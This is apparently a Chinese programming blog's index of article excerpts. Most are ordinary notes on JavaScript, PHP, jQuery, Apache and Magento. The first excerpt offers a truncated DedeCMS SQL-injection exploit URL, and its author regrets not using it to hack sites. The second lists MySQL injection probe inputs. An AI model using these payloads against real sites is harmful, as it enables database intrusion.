limon87
- 浏览: 70533 次
- 性别:
- 来自: 广州
-
最新评论
文章列表
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
我一般是这样测试的:
提交 mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
mumaasp.com/plus/search.php?keyword=as& ...
默认存在的数据库:
mysql
需要root权限读取
information_schema
在5以上的版本中存在
测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况:
字符串类型查询时:
数字类型查询时:
登陆时:
'
假
''
真
"
假
""
真
\
假
\\
真
AND 1
真
AND 0
假
AND true
真
AND false ...
一些常用的JS正则表达式
- 博客分类:
- javascript
必填项: /[^(^\s*)|(\s*$)]/,
email : /^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/,
电话 : /^((\(\d{2,3}\))|(\d{3}\-))?(\(0\d{2,3}\)|0\d{2,3}-)?[1-9]\d{6,7}(\-\d{1,4})?$/,
手机: /^((\(\d{3}\))|(\d{3}\-))?13[0-9]\d{8}?$|15[89]\d{8}?$/,
url地址 : /^http:\/\/[A-Za-z0-9]+\.[A-Za-z0-9]+[\/=\?%\-& ...
JS中数组Array的用法
- 博客分类:
- javascript
js数组元素的添加和删除一直比较迷惑,今天终于找到详细说明的资料了,先给个我测试的代码^-^
var arr = new Array();
arr[0] = "aaa";
arr[1] = "bbb";
arr[2] = "ccc";
//alert(arr.length);//3
arr.pop();
//alert(arr.length);//2
...
原因简单说下:
确保你的apache主配置文件中对你的网站所在的目录定义了下面的内容:
Options Indexes FollowSymLinks
AllowOverride all
否则你的.htaccess不会工作。
from:http://blog.163.com/lgh_2002/blog/static/440175262011103112841962/
php date 参数大全
- 博客分类:
- php
format 字符
说明
返回值例子
日
---
---
d
月份中的第几天,有前导零的 2 位数字
01 到 31
D
星期中的第几天,文本表示,3 个字母
Mon 到 Sun
j
月份中的第几天,没有前导零
1 到 31
l(“L”的小写字母)
星期几,完整的文本格式
Sunday 到 Saturday
N
ISO-8601 格式数字表示的星期中的第几天(PHP 5.1.0 新加)
1(表示星期一)到 7(表示星期天)
S
每月天数后面的英文后缀,2 个字符
st,nd,rd 或者 th。可以 ...
magento 二次开发-magento 免费模板-magento模块开发-magento定制模板-magento入门教程-magento 定制开发 -magento 插件开发-magento模板制作 -magento 下载-magento 教程下载-magento 教程
Magento 的配置文件如同该系统的心脏一般。它负责从总体上配置所有被请求的模块,模型,类,模板文件等。它是绝大部分PHP程序员不会接触到的一块抽象层,同时也 会增加一系列的开发成本,但是,所有这些都是值得的,因为Magento的配置文件允许你对系统的默认功能进行你无法想象的高度扩展。
本篇文章中包括的内容有,
设 ...
jquery 回车事件 兼容ie与firefox火狐,本文章举了二款实例来告诉你关于jquery 在ie与firefox火狐区别与使用方法。
$(document).ready(function(){ $(“按下回车的控件”).keydown(function(e){ var curkey = e.which; if(curkey == 13){ $(“#回车事件按钮控件”).click(); return false; } }); });
简单地记下jquery实现回车事件,代码如下: 全局:
代码如下: $(function(){ document.onkeydown = f ...
var adjustIframe = function (id) {
var iframe = document.getElementById(id)
var idoc = iframe.contentWindow && iframe.contentWindow.document || iframe.contentDocument;
var callback = function () {
var iheight = Math.max(idoc.body.scrollHeight, idoc.documentElement.scr ...
Query对DOM的事件触发具有冒泡特性。有时利用这一特性可以减少重复代码,但有时候我们又不希望事件冒泡。这个时候就要阻止 jQuery.Event冒泡。
在jQuery.Event 的文档 中的开头得知,jQuery.Event对象是符合W3C标准的一个事件对象,同时jQuery.Event免去了检查兼容IE的步骤。
jQuery.Event提供了一个非常简单的方法来阻止事件冒泡:event.stopPropagation();
$(“p”).click(function(event){
转载:http://hi.baidu.com/lq3158/blog/item/dc121d083cbaac36e92488a2.html MySQL提供标准的SQL模式匹配,以及一种基于象Unix实用程序如vi、grep和sed的扩展正则表达式模式匹配的格式。
SQL的模式匹配允许你使用“_”匹配任何单个字符,而“%”匹配任意数目字符(包括零个字符)。在 MySQL中,SQL的模式缺省是忽略大小写的。下面显示一些例子。注意在你使用SQL模式时,你不能使用=或!=;而使用LIKE或NOT LIKE比较操作符。
为了找出以“b”开头的名字:
mysql> SELECT * FROM ...
print_r(get_meta_tags('http://www.muyangcheng.com'));
print_r(get_headers('http://www.muyangcheng.com',1));
print_r(get_headers('http://www.muyangcheng.com'));
结果如下:
Array
(
[generator] => phpwind 8.7
[description] => 牧羊城(www.muyangcheng.com),广州论坛是一个集广州消费经验、广州生活信息、广州超市商场打折优惠信息、广 ...
escape() 方法: 采用ISO Latin字符集对指定的字符串进行编码。所有的空格符、标点符号、特殊字符以及其他非ASCII字符都将被转化成%xx格式的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。比如,空格符对应的编码是 。 不会被此方法编码的字符: @ * / + encodeURI() 方法: 把URI字符串采用UTF-8编码格式转化成escape格式的字符串。 不会被此方法编码的字符:! @ # $& * ( ) = : / ; ? + ' encodeURIComponent() 方法: 把URI字符串采用UTF-8编码格式转化成escape格式的字符串 ...
function parse_mp3($file_name) {
$info_struct = array (
"song_name" => array(3, 33, 'trim'),
"artist_name" => array(33, 63, 'trim'),
"album_name" => array(63, 93, 't ...
//不允许iframe嵌入
if(window.top !== window.self){ window.top.location = window.location;}